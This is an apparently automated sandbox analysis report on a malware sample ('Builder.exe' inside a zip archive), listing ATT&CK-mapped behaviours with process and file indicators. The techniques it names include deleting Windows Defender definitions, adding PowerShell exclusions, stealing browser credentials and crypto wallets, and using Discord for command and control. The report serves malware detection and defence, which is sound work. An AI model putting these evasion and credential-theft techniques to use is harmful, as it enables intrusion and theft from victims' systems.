e1a5ef2777acf33ec21f7dc25bb4b1beec3b6f12752385b1d6d07d8ae917c078

Analysis

max time kernel
648s
max time network
436s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
04-12-2024 09:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Obekräftade 680491.zip
Size

7.2MB
MD5

90a58ab991bc0eb1edd154a31bcda5d2
SHA1

6de61f5326b5f150a9a4c7eea232e8e87fa70b63
SHA256

e1a5ef2777acf33ec21f7dc25bb4b1beec3b6f12752385b1d6d07d8ae917c078
SHA512

3b9bc29b8c59d0d2eebe09beaa17ab0390a97957b9eeb7322ec253ced901db52ef0d60db0ee5d5f4a45db082b90870fa3b4bab0f22af29696e761d894b9dd595
SSDEEP

196608:OMVFkE8DSc4eokbV5C5BTDZasMKvjx9B+:OMV2E8D2eokJg5BTDP1F9E

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 2 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
5896	MpCmdRun.exe
4588	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4036	powershell.exe
6016	powershell.exe
4020	powershell.exe
5816	powershell.exe
4492	powershell.exe
3632	powershell.exe
1396	powershell.exe
5684	powershell.exe

Drops file in Drivers directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Builder.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Builder.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3144	cmd.exe
2156	powershell.exe
1384	cmd.exe
4456	powershell.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 6 IoCs

pid	Process
3612	Builder.exe
1060	Builder.exe
4240	rar.exe
6124	Builder.exe
2524	Builder.exe
5416	rar.exe

Loads dropped DLL 36 IoCs

pid	Process
2908	wuauclt.exe
2908	wuauclt.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
1060	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe
2524	Builder.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

System Binary Proxy Execution: wuauclt 1 TTPs 1 IoCs

Abuse Wuauclt to proxy execution of malicious code.

defense_evasion

System Binary Proxy Execution

T1218

pid	Process
2908	wuauclt.exe

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
141	discord.com
149	discord.com
150	discord.com
140	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
147	ip-api.com
132	ip-api.com
138	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Sysprep\ActionFiles\Specialize.xml	TiWorker.exe
File opened for modification	C:\Windows\System32\Sysprep\ActionFiles\Cleanup.xml	TiWorker.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	TiWorker.exe
File opened for modification	C:\Windows\System32\NlsData001d.dll	TiWorker.exe
File opened for modification	C:\Windows\System32\Speech_OneCore\Common\sv-SE	TiWorker.exe
File opened for modification	C:\Windows\System32\Speech_OneCore\Common\sv-SE\tokens_TTS_sv-SE.xml	TiWorker.exe
File opened for modification	C:\Windows\SysWOW64\Speech_OneCore\Common\sv-SE\tokens_TTS_sv-SE.xml	TiWorker.exe
File opened for modification	C:\Windows\System32\Sysprep\ActionFiles	TiWorker.exe
File opened for modification	C:\Windows\System32\Sysprep\ActionFiles\Respecialize.xml	TiWorker.exe
File opened for modification	C:\Windows\System32\sv-SE\ExpressiveInput.041D.lex	TiWorker.exe
File opened for modification	C:\Windows\SysWOW64\NlsData001d.dll	TiWorker.exe
File opened for modification	C:\Windows\System32\sv-SE\datadict.041D.dat	TiWorker.exe
File opened for modification	C:\Windows\SysWOW64\Speech_OneCore\Common\sv-SE	TiWorker.exe
File opened for modification	C:\Windows\System32\Sysprep\ActionFiles\Generalize.xml	TiWorker.exe
File opened for modification	C:\Windows\System32\uk-UA\FXSRESM.dll.mui	TiWorker.exe
File opened for modification	C:\Windows\System32\uk-UA\mspaint.exe.mui	TiWorker.exe
File opened for modification	C:\Windows\System32\NlsLexicons001d.dll	TiWorker.exe
File opened for modification	C:\Windows\System32\sv-SE\datamap.041D.dat	TiWorker.exe

Enumerates processes with tasklist 1 TTPs 10 IoCs

discovery

Process Discovery

T1057

pid	Process
1612	tasklist.exe
3568	tasklist.exe
5708	tasklist.exe
1716	tasklist.exe
2828	tasklist.exe
3200	tasklist.exe
5412	tasklist.exe
5432	tasklist.exe
4040	tasklist.exe
1888	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4324	cmd.exe
1356	cmd.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0004000000040d20-2235.dat	upx
behavioral1/memory/1060-2238-0x00007FFE29D80000-0x00007FFE2A369000-memory.dmp	upx
behavioral1/files/0x0004000000040d11-2241.dat	upx
behavioral1/memory/1060-2244-0x00007FFE2ECB0000-0x00007FFE2ECD3000-memory.dmp	upx
behavioral1/files/0x0004000000040d1e-2243.dat	upx
behavioral1/files/0x0004000000040d1d-2247.dat	upx
behavioral1/files/0x0004000000040d18-2261.dat	upx
behavioral1/memory/1060-2262-0x00007FFE3DD20000-0x00007FFE3DD2F000-memory.dmp	upx
behavioral1/files/0x0004000000040d17-2260.dat	upx
behavioral1/files/0x0004000000040d16-2259.dat	upx
behavioral1/files/0x0004000000040d15-2258.dat	upx
behavioral1/files/0x0004000000040d14-2257.dat	upx
behavioral1/files/0x0004000000040d13-2256.dat	upx
behavioral1/files/0x0004000000040d12-2255.dat	upx
behavioral1/files/0x0004000000040d10-2254.dat	upx
behavioral1/files/0x0004000000040d25-2253.dat	upx
behavioral1/files/0x0004000000040d24-2252.dat	upx
behavioral1/files/0x0004000000040d23-2251.dat	upx
behavioral1/files/0x0004000000040d1f-2248.dat	upx
behavioral1/memory/1060-2268-0x00007FFE2D1D0000-0x00007FFE2D1FD000-memory.dmp	upx
behavioral1/memory/1060-2270-0x00007FFE3C620000-0x00007FFE3C639000-memory.dmp	upx
behavioral1/memory/1060-2272-0x00007FFE2C950000-0x00007FFE2C973000-memory.dmp	upx
behavioral1/memory/1060-2274-0x00007FFE2B570000-0x00007FFE2B6E7000-memory.dmp	upx
behavioral1/memory/1060-2276-0x00007FFE3A570000-0x00007FFE3A589000-memory.dmp	upx
behavioral1/memory/1060-2278-0x00007FFE3DBD0000-0x00007FFE3DBDD000-memory.dmp	upx
behavioral1/memory/1060-2280-0x00007FFE2C1A0000-0x00007FFE2C1D3000-memory.dmp	upx
behavioral1/memory/1060-2288-0x00007FFE2ECB0000-0x00007FFE2ECD3000-memory.dmp	upx
behavioral1/memory/1060-2287-0x00007FFE29860000-0x00007FFE29D80000-memory.dmp	upx
behavioral1/memory/1060-2285-0x00007FFE2AA90000-0x00007FFE2AB5D000-memory.dmp	upx
behavioral1/memory/1060-2284-0x00007FFE29D80000-0x00007FFE2A369000-memory.dmp	upx
behavioral1/memory/1060-2290-0x00007FFE2DBD0000-0x00007FFE2DBE4000-memory.dmp	upx
behavioral1/memory/1060-2292-0x00007FFE2D1D0000-0x00007FFE2D1FD000-memory.dmp	upx
behavioral1/memory/1060-2293-0x00007FFE3DBB0000-0x00007FFE3DBBD000-memory.dmp	upx
behavioral1/memory/1060-2295-0x00007FFE2A970000-0x00007FFE2AA8C000-memory.dmp	upx
behavioral1/memory/1060-2318-0x00007FFE2C950000-0x00007FFE2C973000-memory.dmp	upx
behavioral1/memory/1060-2323-0x00007FFE2B570000-0x00007FFE2B6E7000-memory.dmp	upx
behavioral1/memory/1060-2393-0x00007FFE3A570000-0x00007FFE3A589000-memory.dmp	upx
behavioral1/memory/1060-2463-0x00007FFE2C1A0000-0x00007FFE2C1D3000-memory.dmp	upx
behavioral1/memory/1060-2465-0x00007FFE2AA90000-0x00007FFE2AB5D000-memory.dmp	upx
behavioral1/memory/1060-2476-0x00007FFE29860000-0x00007FFE29D80000-memory.dmp	upx
behavioral1/memory/1060-2484-0x00007FFE2B570000-0x00007FFE2B6E7000-memory.dmp	upx
behavioral1/memory/1060-2492-0x00007FFE2A970000-0x00007FFE2AA8C000-memory.dmp	upx
behavioral1/memory/1060-2478-0x00007FFE29D80000-0x00007FFE2A369000-memory.dmp	upx
behavioral1/memory/1060-2479-0x00007FFE2ECB0000-0x00007FFE2ECD3000-memory.dmp	upx
behavioral1/memory/1060-2528-0x00007FFE2A970000-0x00007FFE2AA8C000-memory.dmp	upx
behavioral1/memory/1060-2529-0x00007FFE29860000-0x00007FFE29D80000-memory.dmp	upx
behavioral1/memory/1060-2527-0x00007FFE3DBB0000-0x00007FFE3DBBD000-memory.dmp	upx
behavioral1/memory/1060-2526-0x00007FFE2DBD0000-0x00007FFE2DBE4000-memory.dmp	upx
behavioral1/memory/1060-2524-0x00007FFE2AA90000-0x00007FFE2AB5D000-memory.dmp	upx
behavioral1/memory/1060-2523-0x00007FFE2C1A0000-0x00007FFE2C1D3000-memory.dmp	upx
behavioral1/memory/1060-2522-0x00007FFE3DBD0000-0x00007FFE3DBDD000-memory.dmp	upx
behavioral1/memory/1060-2521-0x00007FFE3A570000-0x00007FFE3A589000-memory.dmp	upx
behavioral1/memory/1060-2520-0x00007FFE2B570000-0x00007FFE2B6E7000-memory.dmp	upx
behavioral1/memory/1060-2519-0x00007FFE2C950000-0x00007FFE2C973000-memory.dmp	upx
behavioral1/memory/1060-2518-0x00007FFE3C620000-0x00007FFE3C639000-memory.dmp	upx
behavioral1/memory/1060-2517-0x00007FFE2D1D0000-0x00007FFE2D1FD000-memory.dmp	upx
behavioral1/memory/1060-2516-0x00007FFE3DD20000-0x00007FFE3DD2F000-memory.dmp	upx
behavioral1/memory/1060-2515-0x00007FFE2ECB0000-0x00007FFE2ECD3000-memory.dmp	upx
behavioral1/memory/1060-2514-0x00007FFE29D80000-0x00007FFE2A369000-memory.dmp	upx
behavioral1/memory/2524-2553-0x00007FFE29D80000-0x00007FFE2A369000-memory.dmp	upx
behavioral1/memory/2524-2554-0x00007FFE3DD20000-0x00007FFE3DD2F000-memory.dmp	upx
behavioral1/memory/2524-2559-0x00007FFE2D1D0000-0x00007FFE2D1FD000-memory.dmp	upx
behavioral1/memory/2524-2560-0x00007FFE3C620000-0x00007FFE3C639000-memory.dmp	upx
behavioral1/memory/2524-2561-0x00007FFE2BDF0000-0x00007FFE2BF67000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Ink\hwrsvelm.dat	TiWorker.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Ink\hwrsvesh.dat	TiWorker.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Ink\hwrsvesymnn.dat	TiWorker.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\Servicing\WUFodMetadataCache\metadata\Language.OCR~sr-latn-rs~1.0.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_1129891307\FoDEnum\Metadata\DesktopBaselessCompDB_el-gr.CompDB.xml	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-CertificateServices-Tools-FoD-Package-Wrapper~31bf3856ad364e35~amd64~lt-LT~10.0.19041.4046.cat	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\WinPE-DismCmdlets-Package-Wrapper~31bf3856ad364e35~amd64~~10.0.19041.4522.cat	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\HyperV-Networking-Containers-Package~31bf3856ad364e35~amd64~sv-SE~10.0.19041.1.cat	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-WSUS-Tools-FoD-Package-Wrapper~31bf3856ad364e35~amd64~es-MX~10.0.19041.3636.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-MediaFeaturePack-OOB-Package-Wrapper~31bf3856ad364e35~amd64~ko-KR~10.0.19041.3636.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\WinPE-SecureStartup-Package-Wrapper~31bf3856ad364e35~amd64~sv-SE~10.0.19041.4474.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\amd64_microsoft-onecore-d..onmanager.resources_31bf3856ad364e35_10.0.19041.1_sv-se_3b3e1d7ac2eefeb2	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\amd64_microsoft-windows-m..kstvtuner.resources_31bf3856ad364e35_10.0.19041.1_sv-se_8b7359384e0bd3b1	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\amd64_microsoft-windows-s..p-cleanup.resources_31bf3856ad364e35_10.0.19041.1_sv-se_9c0a1daf124a9710	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\amd64_networking-mpssvc-wmi.resources_31bf3856ad364e35_10.0.19041.1_sv-se_ae8cae7739813750	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_1582336865\Microsoft-Windows-LanguageFeatures-TextToSpeech-sv-se-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\6689a9901c90d94497fcceca66b538fa.tmp	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\WinPE-WMI-Package-Wrapper~31bf3856ad364e35~amd64~sl-SI~10.0.19041.4474.cat	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-Printing-WFS-FoD-Package-Wrapper~31bf3856ad364e35~amd64~tr-TR~10.0.19041.3636.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-MediaFeaturePack-OOB-Package-Wrapper~31bf3856ad364e35~amd64~et-EE~10.0.19041.3636.cat	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-StorageManagement-FoD-Package-Wrapper~31bf3856ad364e35~amd64~sv-SE~10.0.19041.3636.cat	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\microsoft-windows-winpe-languagepack-package-Wrapper~31bf3856ad364e35~amd64~sr-LATN-RS~10.0.19041.4529.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_1582336865\FodWU\Metadata\DesktopBaselessCompDB_ca-es.CompDB.xml.cab	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\msil_smsvchost.resources_b03f5f7f11d50a3a_10.0.19041.1_sv-se_32814d1e40d62535	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-ActiveDirectory-DS-LDS-Tools-FoD-Package-Wrapper~31bf3856ad364e35~amd64~~10.0.19041.4474.cat	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_1582336865\FodWU\Metadata\DesktopTargetCompDB_tr-tr.xml.cab	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\amd64_microsoft-windows-u..tionuxexe.resources_31bf3856ad364e35_10.0.19041.1_sv-se_df8c0372985026bf	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-LanguageFeatures-Handwriting-zh-cn-Package-Wrapper~31bf3856ad364e35~amd64~~10.0.19041.4355.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\HyperV-Networking-Package~31bf3856ad364e35~amd64~sv-SE~10.0.19041.1.cat	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_1129891307\FoDEnum\Metadata\DesktopTargetCompDB_coren_bg-bg.xml	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_1129891307\FoDEnum\Metadata\DesktopTargetCompDB_hu-hu.xml.cab	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-CertificateServices-Tools-FoD-Package-Wrapper~31bf3856ad364e35~amd64~en-US~10.0.19041.4046.mum	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-Composition-Test-FOD-Package-Wrapper~31bf3856ad364e35~amd64~pt-BR~10.0.19041.3636.mum	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-StorageManagement-FoD-Package-Wrapper~31bf3856ad364e35~amd64~uk-UA~10.0.19041.3636.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-ActiveDirectory-DS-LDS-Tools-FoD-Package-Wrapper~31bf3856ad364e35~amd64~sr-LATN-RS~10.0.19041.3996.cat	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-MediaFeaturePack-OOB-Package-Wrapper~31bf3856ad364e35~amd64~sv-SE~10.0.19041.3636.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-WSUS-Tools-FoD-Package-Wrapper~31bf3856ad364e35~amd64~et-EE~10.0.19041.3636.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\WinPE-PmemCmdlets-Package-Wrapper~31bf3856ad364e35~amd64~~10.0.19041.4355.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_1582336865\FodWU\Metadata\DesktopTargetCompDB_core_da-dk.xml.cab	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_1582336865\FodWU\Metadata\DesktopTargetCompDB_core_pt-pt.xml	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\amd64_c_holographic.inf.resources_31bf3856ad364e35_10.0.19041.1_sv-se_a2040e912385f160	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\amd64_microsoft-windows-c..r-library.resources_31bf3856ad364e35_10.0.19041.1_sv-se_6f05232f159b7e00	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\amd64_microsoft-windows-d..rpriseetw.resources_31bf3856ad364e35_10.0.19041.1_en-us_dba07a3a5d2f7c93	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\amd64_microsoft-windows-netplwiz-exe.resources_31bf3856ad364e35_10.0.19041.1_sv-se_99279eb2fc8b6b4c	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\OpenSSH-Server-Package-Wrapper~31bf3856ad364e35~amd64~~10.0.19041.3636.cat	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-WinPE-GamingPeripherals-Package-Wrapper~31bf3856ad364e35~amd64~zh-CN~10.0.19041.3636.mum	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\HyperV-Storage-VirtualDevice-FibreChannel-merged-Package~31bf3856ad364e35~amd64~sv-SE~10.0.19041.1.cat	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\Microsoft-Mobile-Sensors-Package~31bf3856ad364e35~amd64~sv-SE~10.0.19041.1.cat	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_1129891307\FoDEnum\Metadata\DesktopTargetCompDB_professional_ar-sa.xml	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\WinPE-PlatformId-Package-Wrapper~31bf3856ad364e35~amd64~de-DE~10.0.19041.4474.mum	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-Notepad-FoD-Package-Wrapper~31bf3856ad364e35~amd64~hr-HR~10.0.19041.488.cat	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\WinPE-AudioCore-Package-Wrapper~31bf3856ad364e35~amd64~sl-SI~10.0.19041.4355.mum	TiWorker.exe
File opened for modification	C:\Windows\WinSxS\Temp\PendingRenames\54be51903046db017a010000240b8004.programdata.cdf-ms	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\amd64_microsoft-windows-dwm-adm.resources_31bf3856ad364e35_10.0.19041.1_sv-se_cbf382d50b08a527\DWM.adml	TiWorker.exe
File created	C:\Windows\Servicing\WUFodMetadataCache\metadata\Language.Basic~pt-br~1.0.mum	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-Notepad-FoD-Package-Wrapper~31bf3856ad364e35~amd64~cs-CZ~10.0.19041.488.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-WSUS-Tools-FoD-Package-Wrapper~31bf3856ad364e35~amd64~zh-TW~10.0.19041.3636.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\WinPE-PowerShell-Package-Wrapper~31bf3856ad364e35~amd64~th-TH~10.0.19041.4239.cat	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\amd64_microsoft-windows-setupapi.resources_31bf3856ad364e35_10.0.19041.1_sv-se_056ddcff5eedc409	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-ActiveDirectory-DS-LDS-Tools-FoD-Package-Wrapper~31bf3856ad364e35~amd64~he-IL~10.0.19041.3996.mum	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\WinPE-WMI-Package-Wrapper~31bf3856ad364e35~amd64~hu-HU~10.0.19041.4474.cat	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-DNS-Tools-FoD-Package-Wrapper~31bf3856ad364e35~amd64~nb-NO~10.0.19041.488.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_1582336865\FodWU\Metadata\DesktopTargetCompDB_core_zh-cn.xml.cab	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\msil_microsoft.windows.d..diaginput.resources_31bf3856ad364e35_10.0.19041.1_en-us_8418c1b8d2d6375f	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-GroupPolicy-Management-Tools-FoD-Package-Wrapper~31bf3856ad364e35~amd64~hr-HR~10.0.19041.488.cat	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-MSPaint-FoD-Package-Wrapper~31bf3856ad364e35~amd64~et-EE~10.0.19041.3758.mum	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp\31147568_2290468998\Microsoft-Windows-WirelessDisplay-FOD-Package-Wrapper~31bf3856ad364e35~amd64~pt-PT~10.0.19041.488.cat	TiWorker.exe
File created	C:\Windows\CbsTemp\31147568_2390744226\Microsoft-Windows-Client-LanguagePack-Package_sv-se~31bf3856ad364e35~amd64~sv-se~.esd\Microsoft-Windows-Client-AssignedAccess-Package~31bf3856ad364e35~amd64~sv-SE~10.0.19041.1.cat	TiWorker.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2332	PING.EXE
6052	cmd.exe
4204	PING.EXE
3664	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
224	cmd.exe
6060	netsh.exe
4040	cmd.exe
2324	netsh.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
